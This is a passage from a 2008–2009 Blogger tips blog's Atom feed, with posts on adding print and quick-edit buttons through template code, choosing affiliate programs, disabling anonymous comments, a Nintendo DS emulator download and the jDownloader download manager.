/&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tbHfaj1A058/Sh-hBV_gTbI/AAAAAAAAG2k/P1I-1JadywA/s1600-h/printButton1.png"&gt;&lt;img style="cursor: pointer; width: 53px; height: 24px;" src="http://3.bp.blogspot.com/_tbHfaj1A058/Sh-hBV_gTbI/AAAAAAAAG2k/P1I-1JadywA/s400/printButton1.png" alt="" id="BLOGGER_PHOTO_ID_5341164727540141490" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;span class='noprint'&amp;gt;&amp;lt;data:post.body/&amp;gt;&amp;lt;/span&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;b:if cond='data:blog.pageType == &amp;amp;quot;item&amp;amp;quot;'&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 102);"&gt;&amp;lt;a href='javascript:window.print()'&amp;gt;&amp;lt;img src='http://i475.photobucket.com/albums/rr115/djyano21/printButton12.gif'/&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Save you template and look for changes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-5664608317128374335?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/5664608317128374335/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=5664608317128374335' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5664608317128374335'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5664608317128374335'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-print-button-to-your-blogger.html' title='How to Add Print Button to your Blogger post.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_tbHfaj1A058/Sh-gUeUEVAI/AAAAAAAAG2U/63cA1lHPLWw/s72-c/printButton1.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-5275523015543854289</id><published>2009-07-26T10:15:00.007-07:00</published><updated>2009-07-26T10:15:30.285-07:00</updated><title type='text'>Selecting Right and Profitable Affiliate Programs for your Blog</title><content type='html'>While selecting correct and profitable Affiliate Program keep in mind that some programs can waste your time and also some others can spoil your website's reputation also.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tbHfaj1A058/Si5h0ua8WnI/AAAAAAAAG7E/kWjPA7CWmBA/s1600-h/Affiliate+Programs.JPG"&gt;&lt;img style="cursor: pointer; width: 335px; height: 203px;" src="http://3.bp.blogspot.com/_tbHfaj1A058/Si5h0ua8WnI/AAAAAAAAG7E/kWjPA7CWmBA/s400/Affiliate+Programs.JPG" alt="" id="BLOGGER_PHOTO_ID_5345317366177487474" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Following is a short guide for Selecting Right and Profitable Affiliate Programs&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1. Your Website&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;If you have Computer related site then promoting the agriculture product will not be a smart choice. Then visitors of your site also matters. Promoting visitor interested products will good.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2.Affiliate merchant's website&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Affiliate merchant's website should only deal with selling of products and not unwanted ads. The product or service must encourage visitors to purchase it.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3.Reputation of the affiliate merchant and quality of goods and services &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;You should must have the knowledge of payments by Affiliate merchant and also their past and present operations.&lt;br /&gt;&lt;br /&gt;Promoting inferior quality and overpriced goods will degrade your reputation.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;4.Commission scheme of the affiliate program&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Most popular Commission sachems are pay per click, pay per lead and pay per sale schemes. With the competition increasing almost all merchants have started offering two tiered commissions, some even offer multi tiered ones.&lt;br /&gt;&lt;br /&gt;Source of the Article -&lt;a href="http://www.webmasters-forum.org"&gt; webmasters-forum.org&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-5275523015543854289?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/5275523015543854289/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=5275523015543854289' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5275523015543854289'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5275523015543854289'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/selecting-right-and-profitable.html' title='Selecting Right and Profitable Affiliate Programs for your Blog'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_tbHfaj1A058/Si5h0ua8WnI/AAAAAAAAG7E/kWjPA7CWmBA/s72-c/Affiliate+Programs.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6518485761793166834</id><published>2009-07-26T10:15:00.005-07:00</published><updated>2009-07-26T10:15:29.226-07:00</updated><title type='text'>Add quick edit pencil icon to the posts.</title><content type='html'>Now when you are login to the blogger and you open your blog you can edit any post as you can do it in Wordpress. You have to click on &lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_jizoPL28qCY/SNb4KXTJ6qI/AAAAAAAABxQ/OmYSBBjYhhQ/s400/quick+edit+pencil.jpg" alt="Blogger pencil quick edit icon" id="BLOGGER_PHOTO_ID_5248655272683629218" title="Blogger pencil quick edit icon" border="0" /&gt; button to edit the post.&lt;br /&gt;&lt;br /&gt;But sometimes this button is not visible. So here is a simple way to add this button.&lt;br /&gt;&lt;br /&gt;1. Login to &lt;a href="http://www.blogger.com/www.blogger.com"&gt;Blogger&lt;/a&gt; &gt;&gt; Settings &gt;&gt; Basic. Now scroll down and look for &lt;label for="quickEditing"&gt;Show Quick Editing on your Blog?&lt;/label&gt;  It should be &lt;select name="quickEditing"&gt;&lt;option value="true" selected="selected"&gt;Yes&lt;/option&gt; &lt;option value="false"&gt;No&lt;/option&gt;&lt;/select&gt; .&lt;br /&gt;&lt;br /&gt;2. Next go to Layout &gt;&gt; Page Elements. Look for Blog Posts and click on  Edit below it.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tbHfaj1A058/SjoSV2CHKeI/AAAAAAAAG-M/9cXs6-wlNm4/s1600-h/Quick+edit.JPG"&gt;&lt;img style="cursor: pointer; width: 362px; height: 212px;" src="http://3.bp.blogspot.com/_tbHfaj1A058/SjoSV2CHKeI/AAAAAAAAG-M/9cXs6-wlNm4/s400/Quick+edit.JPG" alt="" id="BLOGGER_PHOTO_ID_5348607673946810850" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The field before Show Quick Editing should be checked as follows.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_tbHfaj1A058/SjoTRKbwcTI/AAAAAAAAG-U/_8Uc737JXSg/s1600-h/Quick+edit.JPG"&gt;&lt;img style="cursor: pointer; width: 184px; height: 29px;" src="http://1.bp.blogspot.com/_tbHfaj1A058/SjoTRKbwcTI/AAAAAAAAG-U/_8Uc737JXSg/s400/Quick+edit.JPG" alt="" id="BLOGGER_PHOTO_ID_5348608693035364658" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Now save this. It should work now.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If above basic procedure not working for you then you have edit your template to add Quick Edit Button/Pencil to your blog posts.&lt;br /&gt;&lt;br /&gt;1. Sign in to Blogger &gt;&gt; Layout &gt;&gt; Edit HTML &gt;&gt; Download Full Template &gt;&gt; &lt;span id="fullpost"&gt;Expand widget templates.&lt;br /&gt;&lt;br /&gt;2. Now look following section of code is present or not.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;&amp;lt;b:includable id=&amp;#039;postQuickEdit&amp;#039; var=&amp;#039;post&amp;#039;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;  &amp;lt;b:if cond=&amp;#039;data:post.editUrl&amp;#039;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;    &amp;lt;span expr:class=&amp;#039;&amp;quot;item-control &amp;quot; + data:post.adminClass&amp;#039;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;      &amp;lt;a expr:href=&amp;#039;data:post.editUrl&amp;#039; expr:title=&amp;#039;data:top.editPostMsg&amp;#039;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;        &amp;lt;img alt=&amp;#039;&amp;#039; class=&amp;#039;icon-action&amp;#039; src=&amp;#039;http://www.blogger.com/img/icon18_edit_allbkg.gif&amp;#039;/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;      &amp;lt;/a&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;    &amp;lt;/span&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;  &amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;&amp;lt;/b:includable&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;3. If above code is not present then Copy above code and replace it with&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;b:includable id=&amp;#039;postQuickEdit&amp;#039; var=&amp;#039;post&amp;#039;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;4. Now look for&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;div class=&amp;#039;post-footer-line post-footer-line-1&amp;#039;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;and add following code below it&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;b:include data=&amp;#039;post&amp;#039; name=&amp;#039;postQuickEdit&amp;#039;/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You can also add above code to the below of&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;data:post.body /&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Save your template. It's done.&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6518485761793166834?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6518485761793166834/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6518485761793166834' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6518485761793166834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6518485761793166834'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/add-quick-edit-pencil-icon-to-posts.html' title='Add quick edit pencil icon to the posts.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_jizoPL28qCY/SNb4KXTJ6qI/AAAAAAAABxQ/OmYSBBjYhhQ/s72-c/quick+edit+pencil.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1633658994286478307</id><published>2009-07-26T10:15:00.003-07:00</published><updated>2009-07-26T10:15:28.276-07:00</updated><title type='text'>Edit Links Present in Sidebar.</title><content type='html'>When you apply a new blogger template you may found following links in your blog.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tbHfaj1A058/SkXkuBcfRdI/AAAAAAAAHCk/jMHFIfcTDyM/s1600-h/Edit+links.jpg"&gt;&lt;img style="cursor: pointer; width: 136px; height: 140px;" src="http://3.bp.blogspot.com/_tbHfaj1A058/SkXkuBcfRdI/AAAAAAAAHCk/jMHFIfcTDyM/s400/Edit+links.jpg" alt="" id="BLOGGER_PHOTO_ID_5351935211512743378" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;You can easily edit these links with your favorite one as follows:&lt;br /&gt;&lt;br /&gt;Login to Blogger &gt;&gt; Layout &gt;&gt; Edit HTML &gt;&gt; Download Full Template &gt;&gt; Expand Widget Templates.&lt;br /&gt;&lt;br /&gt;Look for the following code&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;MainOrArchivePage&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;h2 class=&amp;quot;sidebar-title&amp;quot;&amp;gt;Links&amp;lt;/h2&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;ul&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;http://news.google.com/&amp;quot;&amp;gt;Google News&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;http://help.blogger.com/bin/answer.py?answer=110&amp;quot;&amp;gt;Edit-Me&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;http://help.blogger.com/bin/answer.py?answer=110&amp;quot;&amp;gt;Edit-Me&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;/ul&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&amp;lt;/MainOrArchivePage&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You can add your favorite link address to http://news.google.com/ or http://help.blogger.com/bin/answer.py?answer=110.&lt;br /&gt;Add Link title to Google News or Edit-Me. Save template.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1633658994286478307?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1633658994286478307/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1633658994286478307' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1633658994286478307'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1633658994286478307'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/edit-links-present-in-sidebar.html' title='Edit Links Present in Sidebar.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_tbHfaj1A058/SkXkuBcfRdI/AAAAAAAAHCk/jMHFIfcTDyM/s72-c/Edit+links.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7748373829152558467</id><published>2009-07-26T10:15:00.001-07:00</published><updated>2009-07-26T10:15:27.209-07:00</updated><title type='text'>Disable anonymous comments in Blogger</title><content type='html'>If you are getting lots of anonymous comments on your blog it is sometimes annoying. But you can easily disable these anonymous comments. Let's see how -&lt;br /&gt;&lt;br /&gt;1. Sign in to Blogger Dashboard &gt;&gt; Settings &gt;&gt; Comments.&lt;br /&gt;&lt;br /&gt;2. Look for "Who Can Comment?" option. Select any one option from last three ones. Make sure first option Anyone is not selected. (look following image). Save.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_tbHfaj1A058/SmW_XC5IgmI/AAAAAAAAHFE/gAzmXiYBEYE/s1600-h/How+do+I+avoid+anonymous+comments.JPG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 249px;" src="http://4.bp.blogspot.com/_tbHfaj1A058/SmW_XC5IgmI/AAAAAAAAHFE/gAzmXiYBEYE/s400/How+do+I+avoid+anonymous+comments.JPG" alt="" id="BLOGGER_PHOTO_ID_5360901334088843874" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Now you will never get anonymous comments.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7748373829152558467?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7748373829152558467/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7748373829152558467' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7748373829152558467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7748373829152558467'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/disable-anonymous-comments-in-blogger.html' title='Disable anonymous comments in Blogger'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_tbHfaj1A058/SmW_XC5IgmI/AAAAAAAAHFE/gAzmXiYBEYE/s72-c/How+do+I+avoid+anonymous+comments.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-8742838473096488162</id><published>2008-06-27T01:29:00.001-07:00</published><updated>2008-06-27T01:35:38.795-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Games consoles'/><title type='text'>Play Nintendo DS on your Computer</title><content type='html'>To play the DS Rom all you have to do is go to FILE&gt;OPEN your rom! (Easy as 123 Very Happy !)&lt;br /&gt;&lt;br /&gt;Emulator Controls&lt;br /&gt;Z = A&lt;br /&gt;X = B&lt;br /&gt;A = Y&lt;br /&gt;S = X&lt;br /&gt;Q = L&lt;br /&gt;W = R&lt;br /&gt;ENTER= START&lt;br /&gt;SPACE= SELECT&lt;br /&gt;MOUSE= TOUCHSCREEN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_Osu6Fdz0VN0/SGSljNLGhaI/AAAAAAAAAEU/eSZLIhUpB-E/s1600-h/fifa6us.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_Osu6Fdz0VN0/SGSljNLGhaI/AAAAAAAAAEU/eSZLIhUpB-E/s400/fifa6us.JPG" alt="" id="BLOGGER_PHOTO_ID_5216476292652107170" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 102, 0);"&gt;Download software :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;http://rapidshare.com/files/105589956/D35muM3.0.4.0NintendoDSEmulator.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   &lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-8742838473096488162?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/8742838473096488162/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=8742838473096488162' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8742838473096488162'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8742838473096488162'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/06/play-nintendo-ds-on-your-computer.html' title='Play Nintendo DS on your Computer'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Osu6Fdz0VN0/SGSljNLGhaI/AAAAAAAAAEU/eSZLIhUpB-E/s72-c/fifa6us.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2933072228499213097</id><published>2008-06-27T01:21:00.000-07:00</published><updated>2008-06-27T01:34:09.761-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rapidshare'/><title type='text'>Working rapidshare automatic downloader program *new*</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_Osu6Fdz0VN0/SGSkhDqYRTI/AAAAAAAAAEM/sOptrCedaJw/s1600-h/2nl5j49.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_Osu6Fdz0VN0/SGSkhDqYRTI/AAAAAAAAAEM/sOptrCedaJw/s400/2nl5j49.jpg" alt="" id="BLOGGER_PHOTO_ID_5216475156227573042" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;If you download a lot of files from free file hosting sites like RapidShare and MegaUpload, but are tired of entering Captchas and waiting for your downloads to begin, jDownloader can help. jDownloader is a download manager that works with both sites, plus a few others. It lets you queue up a bunch of files which it will then proceed to download in the background. It can even read Captchas, which means you don't have to be near your computer when the downloads start.&lt;br /&gt;&lt;br /&gt;The program does have a few quirks. First, jDownloader requires Java to run and you don't install it like a regular Windows application. Rather, you download and extract the contents of a ZIP file and then click the jDownloader.jar file to start the program.&lt;br /&gt;&lt;br /&gt;Now you're almost ready to go. But before you can download any files you'll have to accept the terms of service for each site you want to download files from.&lt;br /&gt;&lt;br /&gt;1. Click the Extra button&lt;br /&gt;2. Select Configuration&lt;br /&gt;3. Select the Hosts tab&lt;br /&gt;4. Check the boxes next to any file hosting service you expect to use.&lt;br /&gt;&lt;br /&gt;Now you're ready to start downloading. Just click the Add Links button and add links to any files you want to download, then click the Start button to begin downloading.&lt;br /&gt;&lt;br /&gt;the program also detects happy hours and you can shedule automatic extraction rar files.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;how to use extractor?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1- enable automatic extraction&lt;br /&gt;&lt;br /&gt;2- download winrar dos command tool and install it.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;http://www.rarlab.com/rar/unrarw32.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3- select unrar.exe&lt;br /&gt;&lt;br /&gt;4- if your archive has a password then click to edit list of passwords and paste your pass or you can add your pass to list by link collector.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;JDownloader currently allows the download of hosting the following:&lt;br /&gt;&lt;br /&gt;* archiv.to&lt;br /&gt;* bluehost.to&lt;br /&gt;* datenklo.net&lt;br /&gt;* depositfiles.com&lt;br /&gt;* fast-load.net&lt;br /&gt;* filefactory.com&lt;br /&gt;* filer.com&lt;br /&gt;* files.to&lt;br /&gt;* imagefap.com&lt;br /&gt;* load.to&lt;br /&gt;* megaupload.com&lt;br /&gt;* netload.in&lt;br /&gt;* ramzal.com&lt;br /&gt;* rapidshare.com&lt;br /&gt;* rapidshare.de&lt;br /&gt;* share.gulli.com&lt;br /&gt;* sharebase.de&lt;br /&gt;* share-now.net Share now.net&lt;br /&gt;* shareonline.biz&lt;br /&gt;* uploaded.to&lt;br /&gt;* uploadstube.com&lt;br /&gt;* xup.in&lt;br /&gt;* yourfiles.biz&lt;br /&gt;* zshare.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;here is the video if you can see working JD&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;http://www.metacafe.com/watch/1339167/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2933072228499213097?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2933072228499213097/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2933072228499213097' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2933072228499213097'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2933072228499213097'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/06/working-rapidshare-automatic-downloader.html' title='Working rapidshare automatic downloader program *new*'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_Osu6Fdz0VN0/SGSkhDqYRTI/AAAAAAAAAEM/sOptrCedaJw/s72-c/2nl5j49.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-8536732718748266398</id><published>2008-06-27T01:14:00.000-07:00</published><updated>2008-06-27T01:35:06.314-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Media player'/><title type='text'>PLAY almost any(any format) FILES IN MEDIA PLAYER</title><content type='html'>THIS IS ONLY 5.92 MEGABITES AND WELL WORTH IT I HAVE BEEN LOOKING FOR SOMETHING LIKE THIS FOR AGES FOUND IT TODAY SO AM POSTING FOR EVERYONE WHO NEEDS IT.&lt;br 